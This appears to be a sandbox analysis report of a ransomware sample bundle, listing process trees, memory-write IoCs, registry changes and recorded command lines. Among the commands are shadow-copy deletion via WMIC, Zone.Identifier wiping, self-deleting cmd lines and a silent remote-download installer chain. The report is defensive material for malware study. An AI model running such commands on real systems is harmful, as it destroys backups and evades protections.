5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
6032	Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
6040	Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
9104	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
9104	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
9432	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$.exe
11884	rundll32.exe
11336	browser.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3748 wrote to memory of 1292	3748	taskmgr.exe	100
PID 3748 wrote to memory of 1292	3748	taskmgr.exe	100
PID 2108 wrote to memory of 1524	2108	powershell.exe	107
PID 2108 wrote to memory of 1524	2108	powershell.exe	107
PID 1524 wrote to memory of 768	1524	cmd.exe	108
PID 1524 wrote to memory of 768	1524	cmd.exe	108
PID 1524 wrote to memory of 768	1524	cmd.exe	108
PID 1524 wrote to memory of 1776	1524	cmd.exe	109
PID 1524 wrote to memory of 1776	1524	cmd.exe	109
PID 1524 wrote to memory of 1776	1524	cmd.exe	109
PID 1524 wrote to memory of 4856	1524	cmd.exe	110
PID 1524 wrote to memory of 4856	1524	cmd.exe	110
PID 1524 wrote to memory of 4856	1524	cmd.exe	110
PID 1524 wrote to memory of 2216	1524	cmd.exe	111
PID 1524 wrote to memory of 2216	1524	cmd.exe	111
PID 1524 wrote to memory of 2216	1524	cmd.exe	111
PID 1524 wrote to memory of 5052	1524	cmd.exe	112
PID 1524 wrote to memory of 5052	1524	cmd.exe	112
PID 1524 wrote to memory of 5052	1524	cmd.exe	112
PID 1524 wrote to memory of 2736	1524	cmd.exe	113
PID 1524 wrote to memory of 2736	1524	cmd.exe	113
PID 1524 wrote to memory of 2736	1524	cmd.exe	113
PID 1524 wrote to memory of 2420	1524	cmd.exe	114
PID 1524 wrote to memory of 2420	1524	cmd.exe	114
PID 1524 wrote to memory of 2420	1524	cmd.exe	114
PID 4856 wrote to memory of 4612	4856	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe	115
PID 4856 wrote to memory of 4612	4856	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe	115
PID 4856 wrote to memory of 4612	4856	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe	115
PID 1776 wrote to memory of 2724	1776	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe	116
PID 1776 wrote to memory of 2724	1776	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe	116
PID 1776 wrote to memory of 2724	1776	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe	116
PID 1776 wrote to memory of 5068	1776	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe	119
PID 1776 wrote to memory of 5068	1776	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe	119
PID 1776 wrote to memory of 5068	1776	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe	119
PID 4856 wrote to memory of 832	4856	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe	120
PID 4856 wrote to memory of 832	4856	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe	120
PID 4856 wrote to memory of 832	4856	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe	120
PID 1524 wrote to memory of 3388	1524	cmd.exe	123
PID 1524 wrote to memory of 3388	1524	cmd.exe	123
PID 1524 wrote to memory of 3388	1524	cmd.exe	123
PID 2724 wrote to memory of 3640	2724	wsmprovhost.exe	127
PID 2724 wrote to memory of 3640	2724	wsmprovhost.exe	127
PID 2216 wrote to memory of 4528	2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe	134
PID 2216 wrote to memory of 4528	2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe	134
PID 2216 wrote to memory of 4528	2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe	134
PID 4528 wrote to memory of 3392	4528	y_installer.exe	136
PID 4528 wrote to memory of 3392	4528	y_installer.exe	136
PID 4528 wrote to memory of 3392	4528	y_installer.exe	136
PID 4528 wrote to memory of 3540	4528	y_installer.exe	137
PID 4528 wrote to memory of 3540	4528	y_installer.exe	137
PID 4528 wrote to memory of 3540	4528	y_installer.exe	137
PID 768 wrote to memory of 1360	768	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe	139
PID 768 wrote to memory of 1360	768	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe	139
PID 768 wrote to memory of 1360	768	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe	139
PID 768 wrote to memory of 1508	768	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe	142
PID 768 wrote to memory of 1508	768	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe	142
PID 768 wrote to memory of 1508	768	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe	142
PID 1184 wrote to memory of 3912	1184	msiexec.exe	144
PID 1184 wrote to memory of 3912	1184	msiexec.exe	144
PID 1184 wrote to memory of 3912	1184	msiexec.exe	144
PID 3912 wrote to memory of 4520	3912	MsiExec.exe	145
PID 3912 wrote to memory of 4520	3912	MsiExec.exe	145
PID 3912 wrote to memory of 4520	3912	MsiExec.exe	145
PID 3912 wrote to memory of 1064	3912	MsiExec.exe	147

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wsmprovhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	wsmprovhost.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00371.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2192

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe
    HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe:Zone.Identifier"
      4⤵
      PID:1360
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe:Zone.Identifier"
      4⤵
      PID:1508
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy "HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe" "C:\Users\Admin\Desktop\july.po"
      4⤵
      PID:8600
  - - C:\Windows\SysWOW64\drivers\spools.exe
      "C:\Windows\SysWow64\drivers\spools.exe" "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\Desktop\july.po"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:7920
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c, C:\Users\Admin\Desktop\july.po
        5⤵
        
        PID:6376
- - C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe
    HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Users\Admin\AppData\Roaming\wsmprovhost.exe
      C:\Users\Admin\AppData\Roaming\wsmprovhost.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:2724
    - - C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3640
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00371\HEUR-T~2.EXE >> NUL
      4⤵
      PID:5068
- - C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe
    HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4856
  - - C:\Users\Admin\AppData\Roaming\wsmprovhost.exe
      C:\Users\Admin\AppData\Roaming\wsmprovhost.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4612
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00371\HEUR-T~3.EXE >> NUL
      4⤵
      PID:832
- - C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
    HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2216
  - - C:\Users\Admin\AppData\Local\Temp\y_installer.exe
      C:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:4528
    - - C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3392
    - - C:\Users\Admin\AppData\Local\Temp\y_installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=4/ct=0/rt=0 --dh 2344 --st 1730844697
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3540
- - C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1a9f6f4967284cd122ee3447eac174f4513103b88b8364a698866eea4a7f773b.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1a9f6f4967284cd122ee3447eac174f4513103b88b8364a698866eea4a7f773b.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 480
      4⤵
      Program crash
      PID:1584
- - C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
    HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
    3⤵
    - Modifies WinLogon for persistence
    - Drops startup file
    - Executes dropped EXE
    - Enumerates connected drives
    - Drops autorun.inf file
    - Drops file in System32 directory
    PID:2736
- - C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Shade.gen-b89ae460c4a36180e3fe0e578e5f36354c438ae36324beaeef889ff69425653b.exe
    HEUR-Trojan-Ransom.Win32.Shade.gen-b89ae460c4a36180e3fe0e578e5f36354c438ae36324beaeef889ff69425653b.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2420
- - C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Bitman.afoy-d4b908f9c294902196657c7b566046f058b2b58a63cfa49abf85e9e300bb8f14.exe
    Trojan-Ransom.Win32.Bitman.afoy-d4b908f9c294902196657c7b566046f058b2b58a63cfa49abf85e9e300bb8f14.exe
    3⤵
    - Executes dropped EXE
    PID:3388
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 888
      4⤵
      Program crash
      PID:4496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5052 -ip 5052
1⤵
PID:3224

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3388 -ip 3388
1⤵
PID:736

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4312

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 358133C104F0DA0F20645CA86D7B91A0
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3912
- - C:\Users\Admin\AppData\Local\Temp\3BFEE05C-C302-4A86-A069-5A09AC7E94D1\lite_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\3BFEE05C-C302-4A86-A069-5A09AC7E94D1\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER
    3⤵
    - Executes dropped EXE
    PID:4520
- - C:\Users\Admin\AppData\Local\Temp\B3FD928A-84C7-4D34-A652-1AE5F93F59C0\seederexe.exe
    "C:\Users\Admin\AppData\Local\Temp\B3FD928A-84C7-4D34-A652-1AE5F93F59C0\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\00ED519C-9242-4771-AEB2-BC647D5BAB31\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Modifies Internet Explorer start page
    - Modifies registry class
    PID:1064
  - - C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe
      C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5368
    - - C:\Users\Admin\AppData\Local\Temp\pin\explorer.exe
        
        C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n /pin-path="C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk" --is-pinning
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5508
  - - C:\Users\Admin\AppData\Local\Temp\00ED519C-9242-4771-AEB2-BC647D5BAB31\sender.exe
      C:\Users\Admin\AppData\Local\Temp\00ED519C-9242-4771-AEB2-BC647D5BAB31\sender.exe --send "/status.xml?clid=2278730-666&uuid=156dd9d3-7247-41ce-bfb5-769f4f44f933&vnt=Windows 10x64&file-no=8%0A10%0A11%0A12%0A13%0A15%0A17%0A18%0A20%0A21%0A22%0A25%0A36%0A40%0A42%0A45%0A57%0A61%0A89%0A102%0A103%0A111%0A123%0A124%0A125%0A129%0A"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5688

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3932

C:\Users\Admin\AppData\Local\Temp\{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe
"C:\Users\Admin\AppData\Local\Temp\{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe" --job-name=yBrowserDownloader-{FB11FC2B-E7D5-49F0-B5F3-B01E7965C94D} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=2278714-666&ui={156dd9d3-7247-41ce-bfb5-769f4f44f933} --use-user-default-locale
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6412
- C:\Users\Admin\AppData\Local\Temp\ybF20C.tmp
  "C:\Users\Admin\AppData\Local\Temp\ybF20C.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\41b507dd-be1c-4e05-8c17-2ee0e1f8b453.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=564988026 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{FB11FC2B-E7D5-49F0-B5F3-B01E7965C94D} --local-path="C:\Users\Admin\AppData\Local\Temp\{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=2278714-666&ui={156dd9d3-7247-41ce-bfb5-769f4f44f933} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\0ad5a356-1cc2-462f-8f78-6231079d03db.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5816
- - C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\41b507dd-be1c-4e05-8c17-2ee0e1f8b453.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=564988026 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{FB11FC2B-E7D5-49F0-B5F3-B01E7965C94D} --local-path="C:\Users\Admin\AppData\Local\Temp\{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=2278714-666&ui={156dd9d3-7247-41ce-bfb5-769f4f44f933} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\0ad5a356-1cc2-462f-8f78-6231079d03db.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:9052
  - - C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\41b507dd-be1c-4e05-8c17-2ee0e1f8b453.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=564988026 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{FB11FC2B-E7D5-49F0-B5F3-B01E7965C94D} --local-path="C:\Users\Admin\AppData\Local\Temp\{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=2278714-666&ui={156dd9d3-7247-41ce-bfb5-769f4f44f933} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\0ad5a356-1cc2-462f-8f78-6231079d03db.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=586550523
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
